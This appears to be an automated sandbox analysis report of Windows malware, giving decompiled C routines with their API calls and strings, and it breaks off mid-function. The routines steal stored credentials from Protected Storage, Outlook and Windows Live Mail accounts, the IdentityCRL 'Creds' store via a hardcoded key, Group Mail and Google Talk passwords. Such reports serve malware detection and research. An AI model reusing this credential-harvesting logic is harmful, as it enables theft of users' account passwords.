                                                                                				_t128 =  *_t73;
                                                                                				if( *_t73 != 0) {
                                                                                					 *((intOrPtr*)(_t98 + 0xf34)) = 0xa;
                                                                                					E0040D37A(_t98 + 0x1c8, _t128, _t73, 0);
                                                                                				}
                                                                                				_t106 = _t98 + 0xc25;
                                                                                				_t129 =  *_t106;
                                                                                				if( *_t106 != 0) {
                                                                                					strcpy(_t98 + 0x52a, _t98 + 0xe2f);
                                                                                					 *((intOrPtr*)(_t98 + 0xf34)) = 0xb;
                                                                                					E0040D37A(_t98 + 0x1c8, _t129, _t106, 0);
                                                                                				}
                                                                                				_push(_t98 + 0x640); // executed
                                                                                				E0040D9F9(_t129); // executed
                                                                                				E0040D865(_t98 + 0x640);
                                                                                				_t76 = E00410D1B(_t98 + 0x870, _t98 + 0x870); // executed
                                                                                				return _t76;
                                                                                			}





















                                                                                0x00403dfe
                                                                                0x00403e04
                                                                                0x00403e09
                                                                                0x00403e0f
                                                                                0x00403e12
                                                                                0x00403e1d
                                                                                0x00403e27
                                                                                0x00403e27
                                                                                0x00403e2c
                                                                                0x00403e32
                                                                                0x00403e35
                                                                                0x00403e45
                                                                                0x00403e55
                                                                                0x00403e5f
                                                                                0x00403e5f
                                                                                0x00403e6a
                                                                                0x00403e6b
                                                                                0x00403e71
                                                                                0x00403e7d
                                                                                0x00403e86

                                                                                APIs
                                                                                  • Part of subcall function 0040E894: FreeLibrary.KERNELBASE(?,0040E8C8,?,?,?,?,?,?,0040421D), ref: 0040E8A0
                                                                                • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C5C
                                                                                • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C71
                                                                                • strcpy.MSVCRT(?,?), ref: 00403E45
                                                                                Strings
                                                                                • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403D22
                                                                                • www.google.com:443/Please log in to your Gmail account, xrefs: 00403CB7
                                                                                • PStoreCreateInstance, xrefs: 00403C6B
                                                                                • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D69
                                                                                • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CFD
                                                                                • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D62
                                                                                • www.google.com/Please log in to your Google Account, xrefs: 00403CC1
                                                                                • www.google.com:443/Please log in to your Google Account, xrefs: 00403CCB
                                                                                • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D95
                                                                                • pstorec.dll, xrefs: 00403C57
                                                                                • www.google.com/Please log in to your Gmail account, xrefs: 00403CAD
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Library$AddressFreeLoadProcstrcpy
                                                                                • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                • API String ID: 2884822230-961845771
                                                                                • Opcode ID: 736501e530afa2727e5d55e5ce378ede5b836f248ef61c614794b5a243445e0a
                                                                                • Instruction ID: d05da07ce2d894a49ef5f331cfc6c83e82fbb8602fa7f27bb7646818df223e42
                                                                                • Opcode Fuzzy Hash: 736501e530afa2727e5d55e5ce378ede5b836f248ef61c614794b5a243445e0a
                                                                                • Instruction Fuzzy Hash: 9B51D771600605B6D714BF72CD46BEABB6CAF00709F10053FF905B61C2DBBCAA5587A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 96%
                                                                                			E0040D9F9(void* __eflags, void* _a4, int _a8, int _a12, void* _a16, char _a20, void* _a24, int _a28, void* _a32, int _a36, void _a40, void _a104) {
                                                                                				void* _v0;
                                                                                				void* __esi;
                                                                                				long _t34;
                                                                                				long _t36;
                                                                                				long _t40;
                                                                                				void* _t64;
                                                                                				void* _t68;
                                                                                				int _t73;
                                                                                
                                                                                				E004118A0(0x102c, _t64);
                                                                                				_t34 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\IdentityCRL", 0, 0x20019,  &_v0); // executed
                                                                                				if(_t34 != 0) {
                                                                                					L10:
                                                                                					return _t34;
                                                                                				}
                                                                                				_t36 = RegOpenKeyExA(_v0, "Dynamic Salt", 0, 0x20019,  &_a4); // executed
                                                                                				if(_t36 != 0) {
                                                                                					L9:
                                                                                					_t34 = RegCloseKey(_v0); // executed
                                                                                					goto L10;
                                                                                				}
                                                                                				_a8 = 0x1000;
                                                                                				_t40 = RegQueryValueExA(_a4, "Value", 0,  &_a36,  &_a40,  &_a8);
                                                                                				_t81 = _t40;
                                                                                				if(_t40 == 0) {
                                                                                					_t63 = _a4 + 0xc;
                                                                                					if(E004047A0(_a4 + 0xc, _t81) != 0) {
                                                                                						_a20 = _a8;
                                                                                						_a24 =  &_a40;
                                                                                						_t73 = 0x40;
                                                                                						_t68 = L"%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd";
                                                                                						_a28 = _t73;
                                                                                						_a32 = _t68;
                                                                                						if(E00404811(_t63,  &_a20,  &_a28,  &_a12) != 0) {
                                                                                							if(_a12 < 0x400) {
                                                                                								memcpy( &_a40, _t68, _t73);
                                                                                								memcpy( &_a104, _a16, _a12);
                                                                                								E0040D6FB(_t64, _a12 + _t73, _a4,  &_a40, _a12 + _t73, _v0);
                                                                                							}
                                                                                							LocalFree(_a16);
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				RegCloseKey(_a4);
                                                                                				goto L9;
                                                                                			}












                                                                                APIs
                                                                                • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E70,?), ref: 0040DA2A
                                                                                • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E70,?), ref: 0040DA44
                                                                                • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E70,?), ref: 0040DA6F
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E70,?), ref: 0040DB20
                                                                                  • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,73AFF420), ref: 004047A8
                                                                                  • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                                • memcpy.MSVCRT ref: 0040DADD
                                                                                • memcpy.MSVCRT ref: 0040DAF2
                                                                                  • Part of subcall function 0040D6FB: RegOpenKeyExA.ADVAPI32(0040DB12,Creds,00000000,00020019,0040DB12,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040DB12,?,?,?,?), ref: 0040D725
                                                                                  • Part of subcall function 0040D6FB: memset.MSVCRT ref: 0040D743
                                                                                  • Part of subcall function 0040D6FB: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040D847
                                                                                  • Part of subcall function 0040D6FB: RegCloseKey.ADVAPI32(?), ref: 0040D858
                                                                                • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E70,?), ref: 0040DB16
                                                                                • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E70,?), ref: 0040DB2A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                                                • API String ID: 2768085393-1693574875
                                                                                • Opcode ID: 2702e5b6582a814fc20eadb9384ec418d8613a8c7f334e4e23fc0615c867cd5e
                                                                                • Instruction ID: 6117dd664a6da5d1700893ef21bfd696e4846e6baba0a559227c27352822965f
                                                                                • Opcode Fuzzy Hash: 2702e5b6582a814fc20eadb9384ec418d8613a8c7f334e4e23fc0615c867cd5e
                                                                                • Instruction Fuzzy Hash: 95316D72504344AFD700DF55DC40D9BBBECEB88358F40493EFA84E2160E774DA188B6A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 82%
                                                                                			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                				struct HINSTANCE__* _t33;
                                                                                				intOrPtr* _t35;
                                                                                				intOrPtr* _t36;
                                                                                				void* _t39;
                                                                                				void _t41;
                                                                                				intOrPtr _t48;
                                                                                				signed int _t50;
                                                                                				int _t52;
                                                                                				intOrPtr _t55;
                                                                                				signed int _t56;
                                                                                				signed int _t57;
                                                                                				intOrPtr _t62;
                                                                                				intOrPtr _t63;
                                                                                				intOrPtr* _t65;
                                                                                				intOrPtr* _t69;
                                                                                				int _t70;
                                                                                				void* _t71;
                                                                                				intOrPtr _t79;
                                                                                
                                                                                				_push(0x70);
                                                                                				_push(0x4123e0);
                                                                                				E00411840(__ebx, __edi, __esi);
                                                                                				_t33 = GetModuleHandleA(0);
                                                                                				if(_t33->i != 0x5a4d) {
                                                                                					L4:
                                                                                					 *(_t71 - 0x1c) = 0;
                                                                                				} else {
                                                                                					_t65 =  *((intOrPtr*)(_t33 + 0x3c)) + _t33;
                                                                                					if( *_t65 != 0x4550) {
                                                                                						goto L4;
                                                                                					} else {
                                                                                						_t56 =  *(_t65 + 0x18) & 0x0000ffff;
                                                                                						if(_t56 == 0x10b) {
                                                                                							__eflags =  *((intOrPtr*)(_t65 + 0x74)) - 0xe;
                                                                                							if( *((intOrPtr*)(_t65 + 0x74)) <= 0xe) {
                                                                                								goto L4;
                                                                                							} else {
                                                                                								_t57 = 0;
                                                                                								__eflags =  *(_t65 + 0xe8);
                                                                                								goto L9;
                                                                                							}
                                                                                						} else {
                                                                                							if(_t56 == 0x20b) {
                                                                                								__eflags =  *((intOrPtr*)(_t65 + 0x84)) - 0xe;
                                                                                								if( *((intOrPtr*)(_t65 + 0x84)) <= 0xe) {
                                                                                									goto L4;
                                                                                								} else {
                                                                                									_t57 = 0;
                                                                                									__eflags =  *(_t65 + 0xf8);
                                                                                									L9:
                                                                                									_t9 = __eflags != 0;
                                                                                									__eflags = _t9;
                                                                                									 *(_t71 - 0x1c) = _t57 & 0xffffff00 | _t9;
                                                                                								}
                                                                                							} else {
                                                                                								goto L4;
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				 *(_t71 - 4) = 0;
                                                                                				__set_app_type(2);
                                                                                				 *0x417b6c =  *0x417b6c | 0xffffffff;
                                                                                				 *0x417b70 =  *0x417b70 | 0xffffffff;
                                                                                				_t35 = __p__fmode();
                                                                                				_t62 =  *0x416b8c; // 0x0
                                                                                				 *_t35 = _t62;
                                                                                				_t36 = __p__commode();
                                                                                				_t63 =  *0x416b88; // 0x0
                                                                                				 *_t36 = _t63;
                                                                                				 *0x417b68 =  *_adjust_fdiv;
                                                                                				_t39 = E00401A4D();
                                                                                				_t79 =  *0x416000; // 0x1
                                                                                				if(_t79 == 0) {
                                                                                					__setusermatherr(E00401A4D);
                                                                                					_pop(_t63);
                                                                                				}
                                                                                				E0041182C(_t39);
                                                                                				_push(0x4123b0);
                                                                                				_push(0x4123ac);
                                                                                				L00411826();
                                                                                				_t41 =  *0x416b84; // 0x0
                                                                                				 *(_t71 - 0x20) = _t41;
                                                                                				 *(_t71 - 0x30) = __getmainargs(_t71 - 0x2c, _t71 - 0x28, _t71 - 0x24,  *0x416b80, _t71 - 0x20);
                                                                                				_push(0x4123a8);
                                                                                				_push(0x412394); // executed
                                                                                				L00411826(); // executed
                                                                                				_t69 =  *_acmdln;
                                                                                				 *((intOrPtr*)(_t71 - 0x34)) = _t69;
                                                                                				if( *_t69 != 0x22) {
                                                                                					while(1) {
                                                                                						__eflags =  *_t69 - 0x20;
                                                                                						if(__eflags <= 0) {
                                                                                							goto L17;
                                                                                						}
                                                                                						_t69 = _t69 + 1;
                                                                                						 *((intOrPtr*)(_t71 - 0x34)) = _t69;
                                                                                					}
                                                                                				} else {
                                                                                					do {
                                                                                						_t69 = _t69 + 1;
                                                                                						 *((intOrPtr*)(_t71 - 0x34)) = _t69;
                                                                                						_t55 =  *_t69;
                                                                                					} while (_t55 != 0 && _t55 != 0x22);
                                                                                					if( *_t69 == 0x22) {
                                                                                						L16:
                                                                                						_t69 = _t69 + 1;
                                                                                						 *((intOrPtr*)(_t71 - 0x34)) = _t69;
                                                                                					}
                                                                                				}
                                                                                				L17:
                                                                                				_t48 =  *_t69;
                                                                                				if(_t48 != 0 && _t48 <= 0x20) {
                                                                                					goto L16;
                                                                                				}
                                                                                				 *(_t71 - 0x4c) = 0;
                                                                                				GetStartupInfoA(_t71 - 0x78);
                                                                                				_t87 =  *(_t71 - 0x4c) & 0x00000001;
                                                                                				if(( *(_t71 - 0x4c) & 0x00000001) == 0) {
                                                                                					_t50 = 0xa;
                                                                                				} else {
                                                                                					_t50 =  *(_t71 - 0x48) & 0x0000ffff;
                                                                                				}
                                                                                				_t52 = E0040B9AD(_t63, _t87, GetModuleHandleA(0), 0, _t69, _t50); // executed
                                                                                				_t70 = _t52;
                                                                                				 *(_t71 - 0x7c) = _t70;
                                                                                				if( *(_t71 - 0x1c) == 0) {
                                                                                					exit(_t70); // executed
                                                                                				}
                                                                                				__imp___cexit();
                                                                                				 *(_t71 - 4) =  *(_t71 - 4) | 0xffffffff;
                                                                                				return E00411879(_t70);
                                                                                			}






















                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                • String ID:
                                                                                • API String ID: 3662548030-0
                                                                                • Opcode ID: d1e6738c7006840e8ff29ac4bb5a107ed27e41239026a4511230c59facba65b5
                                                                                • Instruction ID: d7daaed26df3896bd014a213398510a4c94beeaf1e1b2d32e797684dc565bfa8
                                                                                • Opcode Fuzzy Hash: d1e6738c7006840e8ff29ac4bb5a107ed27e41239026a4511230c59facba65b5
                                                                                • Instruction Fuzzy Hash: 60416DB0D40218DFCB209FA4D984AED7BB4AB08314F24857BE661D72A1D77D99C2CB5C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 92%
                                                                                			E00410D1B(void* __eflags, intOrPtr _a4) {
                                                                                				void _v275;
                                                                                				char _v276;
                                                                                				char _v532;
                                                                                				void _v539;
                                                                                				char _v540;
                                                                                				void _v795;
                                                                                				char _v796;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				int _t44;
                                                                                				char* _t46;
                                                                                				char* _t48;
                                                                                				void* _t64;
                                                                                				intOrPtr _t65;
                                                                                				void* _t66;
                                                                                				signed int _t68;
                                                                                				void* _t74;
                                                                                				void* _t75;
                                                                                
                                                                                				_t75 = __eflags;
                                                                                				_v796 = 0;
                                                                                				memset( &_v795, 0, 0x104);
                                                                                				_t64 = 0x1c;
                                                                                				_t61 =  &_v796;
                                                                                				 *((intOrPtr*)(_a4 + 4)) = 1;
                                                                                				E0040EE59( &_v796, _t64); // executed
                                                                                				E00406734( &_v796, "\\Microsoft\\Windows Mail");
                                                                                				_t65 = _a4;
                                                                                				E00410C43(_t65, _t75, _t61); // executed
                                                                                				 *((intOrPtr*)(_t65 + 4)) = 2;
                                                                                				_t66 = 0x1c;
                                                                                				E0040EE59(_t61, _t66);
                                                                                				E00406734(_t61, "\\Microsoft\\Windows Live Mail");
                                                                                				E00410C43(_a4, _t75, _t61); // executed
                                                                                				_v276 = 0;
                                                                                				memset( &_v275, 0, 0x104);
                                                                                				_v540 = 0;
                                                                                				memset( &_v539, 0, 0x104);
                                                                                				E0040EBC1(_a4, 0x80000001, "Software\\Microsoft\\Windows Live Mail", "Store Root",  &_v276, 0x104); // executed
                                                                                				_t74 = (_t68 & 0xfffffff8) - 0x31c + 0x38;
                                                                                				ExpandEnvironmentStringsA( &_v276,  &_v540, 0x104); // executed
                                                                                				_t44 = strlen( &_v540);
                                                                                				if(_t44 > 0) {
                                                                                					_t48 = _t74 + _t44 + 0x117;
                                                                                					if( *_t48 == 0x5c) {
                                                                                						 *_t48 = 0;
                                                                                					}
                                                                                				}
                                                                                				_push( &_v532);
                                                                                				_t46 =  &_v796;
                                                                                				_push(_t46);
                                                                                				L004115B2();
                                                                                				_t78 = _t46;
                                                                                				if(_t46 != 0) {
                                                                                					_t46 = E00410C43(_a4, _t78,  &_v532); // executed
                                                                                				}
                                                                                				return _t46;
                                                                                			}






















                                                                                APIs
                                                                                • memset.MSVCRT ref: 00410D3C
                                                                                  • Part of subcall function 00406734: strlen.MSVCRT ref: 00406736
                                                                                  • Part of subcall function 00406734: strlen.MSVCRT ref: 00406741
                                                                                  • Part of subcall function 00406734: strcat.MSVCRT(00000000,dA,0000001C,00410D64,\Microsoft\Windows Mail,?,?,?), ref: 00406758
                                                                                  • Part of subcall function 0040EE59: memset.MSVCRT ref: 0040EEAE
                                                                                  • Part of subcall function 0040EE59: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 0040EF17
                                                                                  • Part of subcall function 0040EE59: strcpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 0040EF25
                                                                                • memset.MSVCRT ref: 00410DAA
                                                                                • memset.MSVCRT ref: 00410DC5
                                                                                  • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
                                                                                • ExpandEnvironmentStringsA.KERNELBASE(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 00410DFE
                                                                                • strlen.MSVCRT ref: 00410E0C
                                                                                • _stricmp.MSVCRT(?,?,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?,?), ref: 00410E32
                                                                                Strings
                                                                                • \Microsoft\Windows Live Mail, xrefs: 00410D81
                                                                                • Store Root, xrefs: 00410DD6
                                                                                • Software\Microsoft\Windows Live Mail, xrefs: 00410DDB
                                                                                • \Microsoft\Windows Mail, xrefs: 00410D5A
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memset$strlen$Close$EnvironmentExpandStrings_stricmpstrcatstrcpy
                                                                                • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                • API String ID: 4071991895-2578778931
                                                                                • Opcode ID: 446d342accadaa8f5357ef9c7141ad4d55f165afb8774a5b515e9d11a0344459
                                                                                • Instruction ID: 656a87abbde68b626b6b67706479efffa51c3f1aad4b8967eb2d69b922da332e
                                                                                • Opcode Fuzzy Hash: 446d342accadaa8f5357ef9c7141ad4d55f165afb8774a5b515e9d11a0344459
                                                                                • Instruction Fuzzy Hash: 3D318DB2548348ABD324E799DC46FCB77DC9BC4318F04482FF649D7182E678D68487AA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 76%
                                                                                			E004037B1(void* __ecx, void* __edi, void* __fp0, intOrPtr _a4) {
                                                                                				char _v276;
                                                                                				char _v404;
                                                                                				intOrPtr _v408;
                                                                                				char _v792;
                                                                                				intOrPtr _v796;
                                                                                				char _v924;
                                                                                				char _v936;
                                                                                				void _v1959;
                                                                                				char _v1960;
                                                                                				void _v2983;
                                                                                				char _v2984;
                                                                                				void* __ebx;
                                                                                				void* __esi;
                                                                                				void* _t28;
                                                                                				void* _t50;
                                                                                				void* _t51;
                                                                                				char* _t59;
                                                                                				char* _t63;
                                                                                				void* _t70;
                                                                                
                                                                                				_t70 = __fp0;
                                                                                				_t51 = __ecx;
                                                                                				_v1960 = 0;
                                                                                				memset( &_v1959, 0, 0x3ff);
                                                                                				_v2984 = 0;
                                                                                				memset( &_v2983, 0, 0x3ff);
                                                                                				_t28 = E00410F79(_t51,  &_v2984,  &_v1960); // executed
                                                                                				if(_t28 == 0) {
                                                                                					return _t28;
                                                                                				}
                                                                                				E004021D8( &_v936);
                                                                                				_push( &_v1960);
                                                                                				_t50 = 0x7f;
                                                                                				E004060D0(_t50,  &_v276);
                                                                                				_t59 =  &_v404;
                                                                                				E004060D0(_t50, _t59,  &_v2984);
                                                                                				_v796 = 9;
                                                                                				_v408 = 3;
                                                                                				_t63 = strchr(_t59, 0x40);
                                                                                				_push( &_v404);
                                                                                				if(_t63 == 0) {
                                                                                					if(strlen() + 0xa < 0) {
                                                                                						sprintf( &_v792, "%s@yahoo.com",  &_v404);
                                                                                					}
                                                                                				} else {
                                                                                					strcpy( &_v792, ??);
                                                                                					 *_t63 = 0;
                                                                                				}
                                                                                				strcpy( &_v924,  &_v404);
                                                                                				return E00402407( &_v936, _t70, _a4);
                                                                                			}























                                                                                APIs
                                                                                • memset.MSVCRT ref: 004037D2
                                                                                • memset.MSVCRT ref: 004037E6
                                                                                  • Part of subcall function 00410F79: memset.MSVCRT ref: 00410F9B
                                                                                  • Part of subcall function 00410F79: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00411007
                                                                                  • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
                                                                                  • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
                                                                                • strchr.MSVCRT ref: 00403855
                                                                                • strcpy.MSVCRT(?,?,?,?,?), ref: 00403872
                                                                                • strlen.MSVCRT ref: 0040387E
                                                                                • sprintf.MSVCRT ref: 0040389E
                                                                                • strcpy.MSVCRT(?,?,?,?,?), ref: 004038B4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memset$strcpystrlen$Closememcpysprintfstrchr
                                                                                • String ID: %s@yahoo.com
                                                                                • API String ID: 1649821605-3288273942
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E004034CB(void* __ecx, void* __eflags, void* __fp0, intOrPtr _a4) {
                                                                                				void _v267;
                                                                                				char _v268;
                                                                                				void _v531;
                                                                                				char _v532;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* _t15;
                                                                                				void* _t23;
                                                                                				char* _t28;
                                                                                
                                                                                				_t23 = __ecx;
                                                                                				_v532 = 0;
                                                                                				memset( &_v531, 0, 0x104);
                                                                                				_v268 = 0;
                                                                                				memset( &_v267, 0, 0x104);
                                                                                				_t15 = E0040EBC1(_t23, 0x80000002, "Software\\Group Mail", "InstallPath",  &_v532, 0xfa); // executed
                                                                                				if(_t15 != 0) {
                                                                                					strcpy( &_v268,  &_v532);
                                                                                					_t28 =  &_v268;
                                                                                					E00405F1F(_t28);
                                                                                					strcat(_t28, "fb.dat");
                                                                                					return E004033D7(_t28, __fp0, _a4);
                                                                                				}
                                                                                				return _t15;
                                                                                			}













                                                                                APIs
                                                                                • memset.MSVCRT ref: 004034EB
                                                                                • memset.MSVCRT ref: 00403501
                                                                                  • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
                                                                                • strcpy.MSVCRT(00000000,00000000), ref: 0040353C
                                                                                  • Part of subcall function 00405F1F: strlen.MSVCRT ref: 00405F20
                                                                                  • Part of subcall function 00405F1F: strcat.MSVCRT(00000000,00413044,004062BF,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 00405F37
                                                                                • strcat.MSVCRT(00000000,fb.dat,00000000,00000000), ref: 00403554
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memsetstrcat$Closestrcpystrlen
                                                                                • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                • API String ID: 1387626053-966475738
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 96%
                                                                                			E0040754D(void* __ecx, void* __eflags, int _a4, char _a8, char _a12, void _a13, char _a268, void _a269) {
                                                                                				void* _v0;
                                                                                				char _v4;
                                                                                				long _t29;
                                                                                				void* _t33;
                                                                                				void* _t36;
                                                                                				signed int _t54;
                                                                                				void* _t56;
                                                                                				void* _t57;
                                                                                				void* _t58;
                                                                                
                                                                                				_t50 = __ecx;
                                                                                				E004118A0(0x1110, __ecx);
                                                                                				E0040724C(_a4); // executed
                                                                                				_t29 = E0040EB3F(0x80000001, "Software\\Google\\Google Talk\\Accounts",  &_v4);
                                                                                				_t56 = (_t54 & 0xfffffff8) + 0xc;
                                                                                				if(_t29 == 0) {
                                                                                					_a4 = 0;
                                                                                					_a12 = 0;
                                                                                					memset( &_a13, 0, 0xff);
                                                                                					_t57 = _t56 + 0xc;
                                                                                					_t33 = E0040EC05(_v0, 0,  &_a12);
                                                                                					while(1) {
                                                                                						_t58 = _t57 + 0xc;
                                                                                						if(_t33 != 0) {
                                                                                							break;
                                                                                						}
                                                                                						_t36 = E0040EB3F(_v0,  &_a12,  &_a8);
                                                                                						_t57 = _t58 + 0xc;
                                                                                						if(_t36 == 0) {
                                                                                							_a268 = 0;
                                                                                							memset( &_a269, 0, 0xfff);
                                                                                							E0040EB80(0xfff, _t50, _a8, "pw",  &_a268);
                                                                                							_t57 = _t57 + 0x18;
                                                                                							E00407406( &_a268, _a4,  &_a12);
                                                                                							RegCloseKey(_v0);
                                                                                						}
                                                                                						_a4 = _a4 + 1;
                                                                                						_t33 = E0040EC05(_v0, _a4,  &_a12);
                                                                                					}
                                                                                					_t29 = RegCloseKey(_v0);
                                                                                				}
                                                                                				return _t29;
                                                                                			}













                                                                                APIs
                                                                                  • Part of subcall function 0040724C: memset.MSVCRT ref: 004072AE
                                                                                  • Part of subcall function 0040724C: memset.MSVCRT ref: 004072C2
                                                                                  • Part of subcall function 0040724C: memset.MSVCRT ref: 004072DC
                                                                                  • Part of subcall function 0040724C: memset.MSVCRT ref: 004072F1
                                                                                  • Part of subcall function 0040724C: GetComputerNameA.KERNEL32 ref: 00407313
                                                                                  • Part of subcall function 0040724C: GetUserNameA.ADVAPI32(?,?), ref: 00407327
                                                                                  • Part of subcall function 0040724C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407346
                                                                                  • Part of subcall function 0040724C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040735B
                                                                                  • Part of subcall function 0040724C: strlen.MSVCRT ref: 00407364
                                                                                  • Part of subcall function 0040724C: strlen.MSVCRT ref: 00407373
                                                                                  • Part of subcall function 0040724C: memcpy.MSVCRT ref: 00407385
                                                                                  • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                • memset.MSVCRT ref: 0040759B
                                                                                  • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32 ref: 0040EC28
                                                                                • memset.MSVCRT ref: 004075EC
                                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 0040762A
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00407651
                                                                                Strings
                                                                                • Software\Google\Google Talk\Accounts, xrefs: 0040756C
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUsermemcpy
                                                                                • String ID: Software\Google\Google Talk\Accounts
                                                                                • API String ID: 2959138223-1079885057
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 64%
                                                                                			E0040A5AC(void* __eax) {
                                                                                				void* __esi;
                                                                                				_Unknown_base(*)()* _t26;
                                                                                				void* _t31;
                                                                                				intOrPtr _t34;
                                                                                				char* _t44;
                                                                                				void* _t45;
                                                                                				intOrPtr* _t46;
                                                                                				int _t47;
                                                                                
                                                                                				_t45 = __eax;
                                                                                				_t37 =  *((intOrPtr*)(__eax + 0x37c));
                                                                                				_t47 = 0;
                                                                                				if( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x37c)) + 0x30)) > 0) {
                                                                                					do {
